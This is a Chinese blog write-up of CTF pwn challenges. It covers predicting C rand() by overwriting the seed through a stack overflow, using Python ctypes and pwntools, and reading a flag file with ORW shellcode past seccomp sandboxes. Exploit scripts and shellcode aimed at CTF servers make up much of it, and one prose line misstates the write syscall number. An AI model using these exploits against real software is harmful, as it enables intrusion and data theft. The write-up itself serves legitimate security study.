pwn-随机计算题类型

已于 2023-06-09 22:24:37 修改
阅读量1.2k 收藏 13
点赞数 2
分类专栏: pwn 文章标签: python 网络安全
于 2023-05-25 15:38:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/IT_huanhuan/article/details/130868435
版权

校赛团队共做出两道pwn,剩下两道为覆盖随机数的题,以前没学过,正好出来研究一下。

先研究一下原理,在做题。

先了解下这几个C语言函数

srand()

srand 是 C 语言中的一个库函数,它用于播种由函数 rand 使用的随机数发生器。它的声明为 void srand(unsigned int seed),其中 seed 是一个整型值,用于伪随机数生成算法播种;

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
 
int main()
{
   int i, n;
   time_t t;
   
   n = 5;
   
   /* 初始化随机数发生器 */
   srand((unsigned) time(&t));
 
   /* 输出 0 到 50 之间的 5 个随机数 */
   for( i = 0 ; i < n ; i++ ) {
      printf("%d\n", rand() % 50);
   }
   
  return(0);
}

用法它初始化随机种子,会提供一个种子,这个种子会对应一个随机数,如果使用相同的种子后面的 rand() 函数会出现一样的随机数,如: srand(1); 直接使用 1 来初始化种子。不过为了防止随机数每次重复,常常使用系统时间来初始化,即使用 time函数来获得系统时间,它的返回值为从 00:00:00 GMT, January 1, 1970 到现在所持续的秒数,然后将time_t型数据转化为(unsigned)型再传给srand函数,即: srand((unsigned) time(&t)); 还有一个经常用法,不需要定义time_t型t变量,即: srand((unsigned) time(NULL)); 直接传入一个空指针,因为你的程序中往往并不需要经过参数获得的数据。

进一步说明下:**计算机并不能产生真正的随机数,而是已经编写好的一些无规则排列的数字存储在电脑里,把这些数字划分为若干相等的N份,并为每份加上一个编号用srand()函数获取这个编号,然后rand()就按顺序获取这些数字,当srand()的参数值固定的时候,rand()获得的数也是固定的,所以一般srand的参数用time(NULL),因为系统的时间一直在变,所以rand()获得的数,也就一直在变,相当于是随机数了。只要用户或第三方不设置随机种子,那么在默认情况下随机种子来自系统时钟。如果想在一个程序中生成随机数序列,需要至多在生成随机数之前设置一次随机种子。

即:只需在主程序开始处调用 srand((unsigned)time(NULL)); 后面直接用rand就可以了。不要在 for 等循环放置 srand((unsigned)time(NULL));

rand()
rand` 是 C 语言中的一个库函数,它返回一个范围在 0 到 `RAND_MAX` 之间的伪随机数。`RAND_MAX` 是一个常量,它的默认值在不同的实现中会有所不同,但是值至少是 32767。它的声明为 `int rand(void)
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
 
int main()
{
   int i, n;
   time_t t;
   
   n = 5;
   
   /* 初始化随机数发生器 */
   srand((unsigned) time(&t));
 
   /* 输出 0 到 49 之间的 5 个随机数 */
   for( i = 0 ; i < n ; i++ ) {
      printf("%d\n", rand() % 50);
   }
   
  return(0);
}

所以我们整理一下思路,也就是srand是可以放任意参数,可以生成所选参数代表的随机数。而rand是可以输出srand所产生的参数,for循环几个,可以产生几个。

在这里插入图片描述

pythonDku__ctypes

了解了这几个函数,还有一个python库需要了解,就是python的C语言的库

ctypes函数的用法连接

作为我们pwn手,应该了解一下Ctypes库的用法,在我们将要所解决的题中,就要调用这个库,来实现上述两个函数的作用,当然也有别的办法,只要不嫌麻烦。

libc = cdll.LoadLibrary('libc.so.6')#这里的libc.so.6应该可以不是固定的,只要解决问题用哪个都行。

这行代码使用 ctypes 库中的 cdll.LoadLibrary 函数加载了 /bin/x86_64-linux-gnu/libc.so.6 路径下的共享库,并将其赋值给了变量 libc。这样,你就可以使用 libc 变量来访问该共享库中的函数。

介绍那两个函数用途,要开个题。才容易理解。

payload = b'a'*offect + p64(100000000)#进行一个覆盖
p.sendlineafter('????',payload)
libc.srand(100000000)        #参数与p64()内相同
for i in range(n):           #进行输入数据
   
    num = str(libc.rand()% ?d)#在 Pwn 中,payload 通常是一个字符串,它包含了要发送到目标程序的数据。这些数据通常是一些特殊构造的字节序列,用于触发目标程序中的漏洞或执行特定操作。由于字符串可以方便地表示和操作字节序列,因此 payload 通常是一个字符串。
   
    p.sendlineafter('????',num)

在这里插入图片描述

看着保护全开,我觉着这也应该是随机数题的常态吧。。。

直接运行一下程序,看一下运行情况吧。

在这里插入图片描述

一个输入点,输入名字,随便输一下。

在这里插入图片描述

猜数了。

差不多,输名字,猜数。

放入IDA看一下。

在这里插入图片描述

在这里插入图片描述

seed是种子,用来是srand随机发生器产生随机值,产生随机值后,赋予V6,然后我们要输入一个数,赋予V4两者比较,若不同就GG,若相同,则执行sub_C3E函数

在这里插入图片描述

而sub_C3E正是我们获取shell的关键。

在这里插入图片描述

v7是我们覆盖地址的关键,只要我们将seed覆盖一个我们可知的随机数就okkkk了,构建一下payload覆盖种子。

payload = b'a'*(0x30 - 0x10) + p64(123)
from pwn import *
from ctypes import *

context.arch = 'amd64'
context.log_level = 'debug'
libc = cdll.LoadLibrary('libc.so.6')

#p = remote()
p = process('guess')
payload = b'a'*(0x30 - 0x10) + p64(123)
p.sendlineafter(' name:',payload)
#p.recv()
#p.interactive()
libc.srand(123)
for i in range (10):
    num = str(libc.rand() % 6 + 1)#根据他的格式写的随机数。
    p.sendlineafter(' number:',num)
print(num)
p.interactive()

题目一:是男人就下120层

在这里插入图片描述

64位程序,栈上有canary,不能再栈上写东西,堆栈不可执行。

在这里插入图片描述

运行一下程序,是选择系列。拉进IDA看一下。

在这里插入图片描述

进一下main函数,看着代码挺复杂,其实都是纸老虎,有用的也就几个而已。注意看程序也就才有一个输入点,在for循环内,看一下没有任何栈溢出点

只要让程序到cat_flag就okkkkk了

接下来做的,也就是模拟程序代码——用ctypes库

from pwn import *
from ctypes import *
context.arch = 'amd64'
context.log_level = 'debug'
#p = process('easypwn')
p = remote('node4.anna.nssctf.cn',29000)
libc = cdll.LoadLibrary('libc.so.6')

libc.srand(libc.time(0))
libc.srand(libc.rand() % 3- 1522127470)

for i in range (120):
    num = str(libc.rand()%4+1)
    p.sendlineafter('Floor ',num)
p.interactive()

不知道为什么,有时候能够打通,有时候不能,我猜大概率随机数不同的原因吧

失败了。。。

在这里插入图片描述

成功。。。

在这里插入图片描述

Random–沙盒与orw机制

这题的复现,需要补充一下知识。所以先了解一下沙盒机制和orw。

沙盒

概述

沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。

在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,**只能采取open/read/write的组合方式来读取flag。**当然有些题目可能还会将上面三个系统调用砍掉一个,进一步限制我们获取到flag,这个会在后面的例题看到。

开启沙盒的两种方式

在ctf的pwn题中一般有两种函数调用方式实现沙盒机制,第一种是采用prctl函数调用,第二种是使用seccomp库函数。

prctl函数调用
int sub_1269()
{
  __int16 v1; // [rsp+0h] [rbp-70h] BYREF
  __int16 *v2; // [rsp+8h] [rbp-68h]
  __int16 v3; // [rsp+10h] [rbp-60h] BYREF
  char v4; // [rsp+12h] [rbp-5Eh]
  char v5; // [rsp+13h] [rbp-5Dh]
  int v6; // [rsp+14h] [rbp-5Ch]
  __int16 v7; // [rsp+18h] [rbp-58h]
  char v8; // [rsp+1Ah] [rbp-56h]
  char v9; // [rsp+1Bh] [rbp-55h]
  int v10; // [rsp+1Ch] [rbp-54h]
  __int16 v11; // [rsp+20h] [rbp-50h]
  char v12; // [rsp+22h] [rbp-4Eh]
  char v13; // [rsp+23h] [rbp-4Dh]
  int v14; // [rsp+24h] [rbp-4Ch]
  __int16 v15; // [rsp+28h] [rbp-48h]
  char v16; // [rsp+2Ah] [rbp-46h]
  char v17; // [rsp+2Bh] [rbp-45h]
  int v18; // [rsp+2Ch] [rbp-44h]
  __int16 v19; // [rsp+30h] [rbp-40h]
  char v20; // [rsp+32h] [rbp-3Eh]
  char v21; // [rsp+33h] [rbp-3Dh]
  int v22; // [rsp+34h] [rbp-3Ch]
  __int16 v23; // [rsp+38h] [rbp-38h]
  char v24; // [rsp+3Ah] [rbp-36h]
  char v25; // [rsp+3Bh] [rbp-35h]
  int v26; // [rsp+3Ch] [rbp-34h]
  __int16 v27; // [rsp+40h] [rbp-30h]
  char v28; // [rsp+42h] [rbp-2Eh]
  char v29; // [rsp+43h] [rbp-2Dh]
  int v30; // [rsp+44h] [rbp-2Ch]
  __int16 v31; // [rsp+48h] [rbp-28h]
  char v32; // [rsp+4Ah] [rbp-26h]
  char v33; // [rsp+4Bh] [rbp-25h]
  int v34; // [rsp+4Ch] [rbp-24h]
  __int16 v35; // [rsp+50h] [rbp-20h]
  char v36; // [rsp+52h] [rbp-1Eh]
  char v37; // [rsp+53h] [rbp-1Dh]
  int v38; // [rsp+54h] [rbp-1Ch]
  __int16 v39; // [rsp+58h] [rbp-18h]
  char v40; // [rsp+5Ah] [rbp-16h]
  char v41; // [rsp+5Bh] [rbp-15h]
  int v42; // [rsp+5Ch] [rbp-14h]
  __int16 v43; // [rsp+60h] [rbp-10h]
  char v44; // [rsp+62h] [rbp-Eh]
  char v45; // [rsp+63h] [rbp-Dh]
  int v46; // [rsp+64h] [rbp-Ch]
  __int16 v47; // [rsp+68h] [rbp-8h]
  char v48; // [rsp+6Ah] [rbp-6h]
  char v49; // [rsp+6Bh] [rbp-5h]
  int v50; // [rsp+6Ch] [rbp-4h]

  prctl(38, 1LL, 0LL, 0LL, 0LL);
  v3 = 32;
  v4 = 0;
  v5 = 0;
  v6 = 4;
  v7 = 21;
  v8 = 0;
  v9 = 9;
  v10 = -1073741762;
  v11 = 32;
  v12 = 0;
  v13 = 0;
  v14 = 0;
  v15 = 53;
  v16 = 7;
  v17 = 0;
  v18 = 0x40000000;
  v19 = 21;
  v20 = 6;
  v21 = 0;
  v22 = 59;
  v23 = 21;
  v24 = 0;
  v25 = 4;
  v26 = 1;
  v27 = 32;
  v28 = 0;
  v29 = 0;
  v30 = 36;
  v31 = 21;
  v32 = 0;
  v33 = 2;
  v34 = 0;
  v35 = 32;
  v36 = 0;
  v37 = 0;
  v38 = 32;
  v39 = 21;
  v40 = 1;
  v41 = 0;
  v42 = 16;
  v43 = 6;
  v44 = 0;
  v45 = 0;
  v46 = 2147418112;
  v47 = 6;
  v48 = 0;
  v49 = 0;
  v50 = 0;
  v1 = 12;
  v2 = &v3;
  return prctl(22, 2LL, &v1);
}

如上面代码所示,展示的是prctl开启沙盒的方式,上面的代码是直接来自某道真实pwn题,经过IDA反编译后的结果。这里最关键的代码是两个prctl的调用,然后其它看似很零散的变量其实是用来设置沙盒的结构体,只不过这里被IDA解释成了这样。

// 函数原型
#include <sys/prctl.h>
int prctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5);

// option选项有很多,剩下的参数也由option确定,这里介绍两个主要的option
// PR_SET_NO_NEW_PRIVS(38) 和 PR_SET_SECCOMP(22)

// option为38的情况
// 此时第二个参数设置为1,则禁用execve系统调用且子进程一样受用
prctl(38, 1LL, 0LL, 0LL, 0LL);

// option为22的情况
// 此时第二个参数为1,只允许调用read/write/_exit(not exit_group)/sigreturn这几个syscall
// 第二个参数为2,则为过滤模式,其中对syscall的限制通过参数3的结构体来自定义过滤规则。
prctl(22, 2LL, &v1);
seccomp库函数

该库函数的使用就比较简单和清晰了,下面的代码也取材于某道真实的pwn题,方便起见,我直接在代码中进行了注释。

__int64 sandbox()
{
  __int64 v1; // [rsp+8h] [rbp-8h]
  
  // 两个重要的宏,SCMP_ACT_ALLOW(0x7fff0000U) SCMP_ACT_KILL( 0x00000000U)
  // seccomp初始化,参数为0表示白名单模式,参数为0x7fff0000U则为黑名单模式
  v1 = seccomp_init(0LL);
  if ( !v1 )
  {
    puts("seccomp error");
    exit(0);
  }
  
  // seccomp_rule_add添加规则
  // v1对应上面初始化的返回值
  // 0x7fff0000即对应宏SCMP_ACT_ALLOW
  // 第三个参数代表对应的系统调用号,0-->read/1-->write/2-->open/60-->exit
  // 第四个参数表示是否需要对对应系统调用的参数做出限制以及指示做出限制的个数,传0不做任何限制
  seccomp_rule_add(v1, 0x7FFF0000LL, 2LL, 0LL);
  seccomp_rule_add(v1, 0x7FFF0000LL, 0LL, 0LL);
  seccomp_rule_add(v1, 0x7FFF0000LL, 1LL, 0LL);
  seccomp_rule_add(v1, 0x7FFF0000LL, 60LL, 0LL);
  seccomp_rule_add(v1, 0x7FFF0000LL, 231LL, 0LL);

  // seccomp_load - Load the current seccomp filter into the kernel
  if ( seccomp_load(v1) < 0 )
  {
          // seccomp_release - Release the seccomp filter state
          // 但对已经load的过滤规则不影响
    seccomp_release(v1);
    puts("seccomp error");
    exit(0);
  }
  return seccomp_release(v1);
}

学习一下seccomp-tools这个工具吧。

指令:

seccomp-tools dump ./elf

第一种,也是最常见的,禁用了execve或者system

 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x04 0xc000003e  if (A != ARCH_X86_64) goto 0006
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x02 0x00 0x40000000  if (A >= 0x40000000) goto 0006
 0004: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0006
 0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0006: 0x06 0x00 0x00 0x00000000  return KILL

这种可以通过 open read write 来读取flag

第二种,是禁用了 open,write,read

 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
 0005: 0x15 0x05 0x00 0x00000000  if (A == read) goto 0011
 0006: 0x15 0x04 0x00 0x00000001  if (A == write) goto 0011
 0007: 0x15 0x03 0x00 0x00000002  if (A == open) goto 0011
 0008: 0x15 0x02 0x00 0x00000003  if (A == close) goto 0011
 0009: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x06 0x00 0x00 0x00000000  return KILL

orw机制

什么是orw?

所谓orw就是open read write 打开flag 写入flag 输出flag

ORW 类题目是指程序开了沙箱保护,禁用了一些函数的调用(如 execve 等),使得我们并不能正常 get shell ,只能通过 ROP 的方式调用 open, read, write 的来读取并打印 flag 内容 fd = open (‘/flag’, ‘r’) read (fd,buf, len) write (1,buf, len)

有两种方法,一种直接写汇编,一种利用shellcraft构造。

下面是汇编:

首先流程是这样的:

open('文件名',0,0)
read(文件描述符,'文件名',读取大小)
write(1,'文件名',写大小)

我们想要读取flag文件里的内容,所以应该构造如下

open('flag',0,0)
read(3,'flag',0x30)
write(1,'flag',0x30)

那么就可以有如下的汇编代码
在这里插入图片描述
在这里插入图片描述

第一行payload中的push 0x00;push 0x67616c66相当于push /x00galf,因为是小端序,倒过来就是push flag/x00。 open的系统调用号是0x5,read是0x3,write是0x5.

代码如下:

from pwn import *
from LibcSearcher import *
r=remote('node4.buuoj.cn','29583')
#r=process('./a')
elf=ELF('./a')
context.log_level = 'debug'
libc = ELF("./libc-2.23.so")
#context.terminal = ['tmux','splitw','-h']

payload=asm('push 0x00;push 0x67616c66;mov ebx,esp;mov eax,0x5;mov ecx,0;mov edx,0;int 0x80;')#
payload+=asm('mov eax,0x3;mov ecx,ebx;mov edx,0x30;mov ebx,0x3;int 0x80;')#
payload+=asm('mov eax,0x4;mov ebx,0x1;int 0x80')#
r.recvuntil('Give my your shellcode:')
r.sendline(payload)
flag=r.recv(200)
print(flag)

利用shellcraft代码如下:

from pwn import *
from LibcSearcher import *


r=remote('node4.buuoj.cn','29583')
#r=process('./a')
elf=ELF('./a')
context.log_level = 'debug'
libc = ELF("./libc-2.23.so")
#context.terminal = ['tmux','splitw','-h']

payload=shellcraft.open('./flag')
payload+=shellcraft.read(3,'./flag',100)
payload+=shellcraft.write(1,'./flag',100)
payload=asm(payload)#记得要把代码转换成汇编语言
r.recvuntil('Give my your shellcode:')
r.sendline(payload)
flag=r.recv(100)
print(flag)
Y_huanhuan
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
pwn-ret2libc基础
admin的博客
10-04 887
题源:基本 ROP - CTF Wiki (ctf-wiki.org)ret2libc的例三 这题的特点是:没有system,没有bin/sh。但是有puts,和gets函数。碰到gets函数基本上又是栈溢出大类中的题目。 ①先检查保护 ②:计算system和bin/sh的实际地址。 核心公式就是:函数真实地址=基地址+偏移量 那么我们如何得到 system 函数的地址呢?这里就主要利用了两个知识点 ①system 函数属于 libc,而 libc.so 动态链接...
BugkuCTF-PWNpwn3-read_note超详细讲解
am_03的博客
08-30 2648
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
PWN测试题目
07-18
信息安全PWN测试题目:用于CTF的练习与PWN的学习,测试题目
2024全国大学生信息安全竞赛(ciscn)半决赛(东北赛区)Pwn题解
最新发布
返璞归真的博客
06-14 973
2024全国大学生信息安全竞赛(ciscn)半决赛东北赛区Pwn题解
pwn学习总结(三) —— 栈溢出经典题型整理
qq_41988448的博客
11-19 2824
pwn学习总结(五) —— 经典题目整理一1. 栈溢出入门2. 字符串截取+缓冲区执行3. GOT泄露4. libc泄露5. 使用DynELF实现远程libc泄露 1. 栈溢出入门 平台:jarvisoj 题目:level0 靶机:nc pwn2.jarvisoj.com 9881 查看程序防护: 查看反汇编: exp: from pwn import * import pwn r = ...
pwn练习题
WuMing_Z的博客
02-23 1108
程序分析:main函数中只存在system("/bin/sh")函数,所以nc可直接拿到权限)nc指令:远程连接对方服务器,对方服务器有什么程序就会执行什么程序nc(ip + 端口号)例如在已给的靶机信息node5.buuoj.cn:29650中node5.buuoj.cn是域名,冒号后的29650是端口号(注意冒号要改为空格)然后直接cat flag 即可。
buu pwn刷题——分类题型1——gets溢出无脑填充
苗_的博客
09-07 1103
gets漏洞 gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执行读操作时不发生溢出。 栈结构: (图自ctf-wiki) warmup_csaw_2016 找到gets漏洞,v5到rbp有0x40的内存 无脑填充即可:'a' * 0x40 + 'b' * 8 + p64(0x40060d) exp #!/usr/bin/python from pwn import * r = remote('no
adworld攻防世界-pwn-新手区-wp
令则
03-05 1083
adworld-pwn-新手区 tcl 到现在才算是正经昨晚攻防世界的pwn新手区, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2088
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
64位程序rop链构造|攻防世界pwn进阶区 pwn-100
Kni9hT's Blog
03-16 4037
文章目录前言利用思路0x01.ida调试发现sub_40063D函数可以溢出0x02.cyclic计算溢出需要填充72字节0x03.checksec看一下保护0x04.利用思路:0x05.可以用vmmap查找binary文件地址0x06.用 `ROPgadget --binary pwn100 --only "pop|ret" | grep rdi`命令寻找ROP0x07.32位程序和64位程序...
pwn100题目文件及exp.zip
08-09
栈溢出漏洞,没有system函数下需要使用DynELF函数来泄漏函数地址,本资源是利用read和puts函数来进行泄漏
pwn的五道基础题
lllwky的博客
03-27 6910
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
pwn篇:随机数种子
weixin_44644249的博客
02-02 1075
攻防世界pwn进阶:dice_game 程序分析: 64位elf可执行文件、libc.so.6库文件 保护:除了Canary,其他保护全开 IDA分析程序逻辑 创建一个随机数种子,为当前时间 首先输入名字,长度为55的数组。程序对输入做了处理,当大于49长度时,将最后一个赋值为“0x00”,也就是对字符串长度进行了限制,这个函数没什么问题。 打印输入的字符串,这里也没什么问题。 调用了srand函数,seed是输入名字时字符串第0x41个元素,也就是该值可控。 SUB_A20函数对随机数进行了处理,
pwn题目的搭建
zszcr的博客
03-22 1567
关闭NX:gcc -z execstack -o pwn pwn.c关闭程序的canary:gcc -fno-stack-protector -o pwn pwn.c如何关闭程序的aslr: gcc -no-pie pwn pwn.c关闭整个linux的aslr保护:sudo -s echo o &gt; /proc/sys/kernel/randomize_va_space挂载pwn题到端口 :...
PWN random [pwnable.kr]CTF writeup题解系列6
重新启程
01-01 726
目录 0x01 题目 0x02 解题思路 0x03 题解 0x01 题目 0x02 解题思路 题目比较简单,直接贴出过程 root@mypwn:/ctf/work/pwnable.kr# ssh random@pwnable.kr -p2222 random@pwnable.kr's password: ____ __ __ ____ ____ ...
PWN题完整出题流程(GCC编译ELF文件,搭建GZ:CTF平台,基于CTF-Xined部署题目至GZ:CTF平台)
流水不争先,争的是滔滔不绝
04-20 2046
GCC编译C源文件至ELF可执行文件,利用docker搭建开源GZ:CTF赛事平台,基于github开源项目CTF-xined部署pwn题至GZ:CTF平台。一次完整实现从C源码开始到题目部署平台的pwn出题全流程详解
LCTF pwn题目
Tesi1a的充电桩
11-25 562
题目 URL SOLVED easy_heap Writeup: https://github.com/LCTF/LCTF2018/tree/master/Writeup/easy_heap Source: https://github.com/LCTF/LCTF2018/tree/master/Source/easy_heap 17 pwn4fun Writeup: https://github...
记第一次解PWN题目
dizhifu3111的博客
11-03 104
# -*- coding: cp936 -*- from pwn import * g_local=False #不设置log_level为debug会导致程序的输出不显示出来 context.log_level = 'debug' if g_local: #启动程序 p = process('./club') #调试器...
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y_huanhuan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值